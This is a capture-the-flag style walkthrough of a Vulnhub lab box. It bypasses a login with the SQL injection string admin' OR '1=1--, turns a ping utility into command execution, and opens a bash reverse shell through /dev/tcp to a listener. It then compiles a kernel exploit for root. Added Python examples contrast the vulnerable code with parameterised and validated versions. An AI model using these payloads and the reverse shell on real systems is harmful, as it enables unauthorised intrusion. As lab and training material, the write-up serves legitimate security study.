Vulnhub virtual machine; on the path to OSCP, this box offers SQL injection on the login form and a client-side ping utility that can be manipulated into command execution for a foothold on the box. Classic enumeration of the box then leads to compiling a privilege-escalation exploit.
Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage, directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you OWN and/or have express written permission to test. Use the information at your own risk.
By continued reading, you acknowledge the aforementioned user risk/responsibilities.
Find target on network
DoS is not useful in this scenario.
Navigate to webpage
Test for SQL injection
username: admin' OR '1=1--
Successful injection! We are now faced with some sort of client-side PING tester.
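To show why the payload above gets past the login, here is an added example (not the page's own code and not the application that runs on this box, whose query the page does not show). It assumes a SQLite-backed demo table with one admin row and contrasts the string-built query that the payload defeats with a parameterised query that treats the same input as a plain string:

```python
import sqlite3


def make_db():
    # Constructed demo database: one admin row, plaintext password for brevity.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'CorrectHorse')")
    return conn


def login_vulnerable(conn, username, password):
    # String-built query. With username admin' OR '1=1-- the injected quote
    # closes the username literal, so the WHERE clause becomes
    #   username='admin' OR '1=1--' AND password='...'
    # AND binds tighter than OR, and the admin row already satisfies the
    # first disjunct, so whatever password was submitted is irrelevant.
    sql = "SELECT * FROM users WHERE username='%s' AND password='%s'" % (username, password)
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    # Parameterised query: the values travel separately from the SQL text, so
    # the quote and the -- are just characters inside a string literal.
    sql = "SELECT * FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    payload = "admin' OR '1=1--"
    print("vulnerable:", login_vulnerable(db, payload, "wrong"))  # True
    print("safe:      ", login_safe(db, payload, "wrong"))        # False
```

Note that this particular payload only succeeds because a user called admin exists; the second string literal does not by itself make the condition true. Parameterisation removes the issue regardless of which user name is supplied.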
Testing a ping for localhost
Looks like we have successful command execution on box.
Remote Code Execution
Attempt to grab the passwd file by submitting:
We are ‘apache’.
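The ping tester and the passwd read above are the same bug: user input spliced into a shell command line. As an added example (not the page's or the box's code, which the page does not show), the following Python sketches that pattern beside a hardened form that validates the value as a literal IP address and executes ping as an argv list with no shell at all. It assumes the tester only needs IP addresses; a hostname field would need its own strict whitelist.

```python
import ipaddress
import subprocess


def build_ping_vulnerable(host):
    # The pattern behind the tester on this box: the submitted value is
    # concatenated into a command string, so a separator such as ';' in the
    # value ends the ping command and starts another one.
    return "ping -c 1 -W 1 " + host


def run_vulnerable(host):
    # Executes the string through /bin/sh, as a shell_exec()-style call would.
    # Returns stdout so the effect of an injected second command is visible.
    proc = subprocess.run(["sh", "-c", build_ping_vulnerable(host)],
                          capture_output=True, text=True, timeout=15)
    return proc.stdout


def validate_host(host):
    # Whitelist validation: only a literal IPv4/IPv6 address passes. A valid
    # address followed by anything else (';', '&&', '|', '`') is rejected.
    try:
        return str(ipaddress.ip_address(host.strip()))
    except ValueError:
        return None


def build_ping_safe(host):
    # Hardened form: validated value, argv list, never handed to a shell.
    addr = validate_host(host)
    if addr is None:
        raise ValueError("rejected host value: %r" % host)
    return ["ping", "-c", "1", "-W", "1", addr]


def run_safe(host):
    # shell=False is the default for a list; ';' could only ever be part of
    # the address argument, and validate_host has already refused it.
    return subprocess.run(build_ping_safe(host), capture_output=True,
                          text=True, timeout=15).returncode


if __name__ == "__main__":
    injected = "127.0.0.1; echo INJECTED"   # constructed, harmless payload
    print(run_vulnerable(injected))          # ping output followed by INJECTED
    try:
        build_ping_safe(injected)
    except ValueError as exc:
        print("hardened form:", exc)
```

The check sits in front of the command, and the command is built as a list; either change alone helps, but only together do they remove both the shell and the untrusted string from the picture.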
Setup Listener on port 9000
Attempt to setup a reverse connection with an easy one liner
/bin/bash -i >& /dev/tcp/[ip_address]/[port] 0>&1
How it works:
*bash -i*: start an interactive bash
*>& /dev/tcp/[ip_address]/[port]*: redirect both stdout and stderr to the TCP connection that bash opens through its /dev/tcp pseudo-device (here the listener's address and port 9000)
*0>&1*: point stdin at the same descriptor, so whatever is typed at the listener reaches the shell as input
Connection established to the box, and we are ‘apache’.
Upgrade the half shell to a full shell. First, test which Python is available on the box.
Investigate the environment
The box is running CentOS release 4.5 with kernel Linux 2.6.9-55.
Check searchsploit for vulnerabilities:
Interesting hit: Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10)
Mirror the exploit to the working directory.
Inspect the exploit source for any embedded shellcode and replace it if needed.
Get the file over to the target box with a SimpleHTTPServer.
As a good habit, save the file to the box's memory-backed filesystem, located at:
Compile on the box:
Make the file executable:
chmod 755 exploit
Bring me the root!